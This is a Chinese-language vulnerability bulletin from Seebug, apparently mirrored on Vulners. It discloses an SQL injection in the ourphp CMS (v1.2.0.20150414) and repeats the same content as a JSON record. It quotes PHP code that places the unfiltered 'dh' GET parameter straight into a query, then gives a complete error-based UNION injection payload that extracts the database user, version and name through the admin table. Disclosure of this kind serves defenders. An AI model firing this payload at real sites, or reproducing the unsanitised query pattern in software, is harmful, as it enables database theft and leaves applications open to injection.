Search...

ourphp最新版注入漏洞又1枚（可出任意数据）

2015-04-22T00:00:00

ID SSV:96063
Type seebug
Reporter Root
Modified 2015-04-22T00:00:00

Description

简要描述：

ourphp最新版注入漏洞又1枚

详细说明：

看到wooyun上ourphp这个厂商又出新的版本了，说修改了wooyun上现有的漏洞，我也来凑凑热闹吧。下载最新版本（ourphp_v1.2.0.20150414），2015-04-14更新的，研究学习一下。注入一枚（这个地方前面提了下个漏洞了，当时没有注意到竟然还有个参数存在注入，无心刷洞）： GET /client/user/?cn-usershopping.html-&ourphp_cms=del&id=1&dh=1 其中dh未过滤，存在注入，看代码

`` 无关代码 elseif ($_GET["ourphp_cms"] == "del"){ $query = $db-> sqllist("selectid,OP_Orderspay,OP_Orderssendfromourphp_orderswhereid= ".$_GET['id']." &&OP_Ordersnumber` = '".$_GET['dh']."'"); $ourphp_rs = mysql_fetch_array($query); if(!mysql_num_rows($query)){ exit("no!"); } if($ourphp_rs[1] == 2){ exit("no!"); } if($ourphp_rs[2] == 2){ exit("no!"); }

$query = $db-&gt; sqllist("delete from `ourphp_orders` where `id` = '".$_GET['id']."'"); 
exit("&lt;script language=javascript&gt;location.replace('".$ourphp_webpath."client/user/?".$ourphp_Language."-usershopping.html');&lt;/script&gt;");

} ```

直接把通过GET获得dh带入了sql语句执行，可注入出任意数据 Payload:GET提交

/client/user/?cn-usershopping.html-&ourphp_cms=del&id=1&dh=1'/**/UNION/**/SELECT/**/1/**/FROM(SELECT/**/COUNT(*),CONCAT(0x23,(SELECT/**/concat(user(),0x23,version(),0x23,database())/**/FROM/**/ourphp_admin/**/LIMIT/**/0,1),0x23,FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.tables/**/GROUP/**/BY/**/x)a%23

测试如下图

漏洞证明：

见详细说明

JSON Vulners Source

Initial Source

{"type": "seebug", "lastseen": "2017-11-19T12:32:58", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "href": "https://www.seebug.org/vuldb/ssvid-96063", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "modified": "2015-04-22T00:00:00", "reporter": "Root", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\nourphp\u6700\u65b0\u7248\u6ce8\u5165\u6f0f\u6d1e\u53c81\u679a\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\n\u770b\u5230wooyun\u4e0aourphp\u8fd9\u4e2a\u5382\u5546\u53c8\u51fa\u65b0\u7684\u7248\u672c\u4e86\uff0c\u8bf4\u4fee\u6539\u4e86wooyun\u4e0a\u73b0\u6709\u7684\u6f0f\u6d1e\uff0c\u6211\u4e5f\u6765\u51d1\u51d1\u70ed\u95f9\u5427\u3002\u4e0b\u8f7d\u6700\u65b0\u7248\u672c\uff08ourphp_v1.2.0.20150414\uff09\uff0c2015-04-14\u66f4\u65b0\u7684\uff0c\u7814\u7a76\u5b66\u4e60\u4e00\u4e0b\u3002\n\u6ce8\u5165\u4e00\u679a\uff08\u8fd9\u4e2a\u5730\u65b9\u524d\u9762\u63d0\u4e86\u4e0b\u4e2a\u6f0f\u6d1e\u4e86\uff0c\u5f53\u65f6\u6ca1\u6709\u6ce8\u610f\u5230\u7adf\u7136\u8fd8\u6709\u4e2a\u53c2\u6570\u5b58\u5728\u6ce8\u5165\uff0c\u65e0\u5fc3\u5237\u6d1e\uff09\uff1a GET /client/user/?cn-usershopping.html-&ourphp_cms=del&id=1&dh=1 \u5176\u4e2ddh\u672a\u8fc7\u6ee4\uff0c\u5b58\u5728\u6ce8\u5165\uff0c\u770b\u4ee3\u7801\n\n\n```\n\u65e0\u5173\u4ee3\u7801\nelseif ($_GET[\"ourphp_cms\"] == \"del\"){\n\t$query = $db-> sqllist(\"select `id`,`OP_Orderspay`,`OP_Orderssend` from `ourphp_orders` where `id` = \".$_GET['id'].\" && `OP_Ordersnumber` = '\".$_GET['dh'].\"'\");\n\t$ourphp_rs = mysql_fetch_array($query);\n\tif(!mysql_num_rows($query)){\n\t\texit(\"no!\");\n\t}\n\tif($ourphp_rs[1] == 2){\n\t\texit(\"no!\");\n\t}\n\tif($ourphp_rs[2] == 2){\n\t\texit(\"no!\");\n\t}\n\t\n\t$query = $db-> sqllist(\"delete from `ourphp_orders` where `id` = '\".$_GET['id'].\"'\"); \n\texit(\"<script language=javascript>location.replace('\".$ourphp_webpath.\"client/user/?\".$ourphp_Language.\"-usershopping.html');</script>\");\n}\n```\n\n\n\u76f4\u63a5\u628a\u901a\u8fc7GET\u83b7\u5f97dh\u5e26\u5165\u4e86sql\u8bed\u53e5\u6267\u884c\uff0c\u53ef\u6ce8\u5165\u51fa\u4efb\u610f\u6570\u636e\nPayload:GET\u63d0\u4ea4\n\n\n```\n/client/user/?cn-usershopping.html-&ourphp_cms=del&id=1&dh=1'/**/UNION/**/SELECT/**/1/**/FROM(SELECT/**/COUNT(*),CONCAT(0x23,(SELECT/**/concat(user(),0x23,version(),0x23,database())/**/FROM/**/ourphp_admin/**/LIMIT/**/0,1),0x23,FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.tables/**/GROUP/**/BY/**/x)a%23\n```\n\n\n\u6d4b\u8bd5\u5982\u4e0b\u56fe\n\n\n[<img src=\"https://images.seebug.org/upload/201504/18212546fcf4aba78280b2e0e6b856260c055965.jpg\" alt=\"\u6210\u529f.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201504/18212546fcf4aba78280b2e0e6b856260c055965.jpg)\n\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\u89c1 \u8be6\u7ec6\u8bf4\u660e", "bulletinFamily": "exploit", "references": [], "objectVersion": "1.4", "viewCount": 0, "status": "details", "sourceHref": "", "cvelist": [], "enchantments_done": [], "title": "ourphp\u6700\u65b0\u7248\u6ce8\u5165\u6f0f\u6d1e\u53c81\u679a\uff08\u53ef\u51fa\u4efb\u610f\u6570\u636e\uff09", "id": "SSV:96063", "sourceData": "", "published": "2015-04-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [], "modified": "2017-11-19T12:32:58"}, "vulnersScore": 7.5}, "_object_type": "robots.models.seebug.SeebugBulletin"}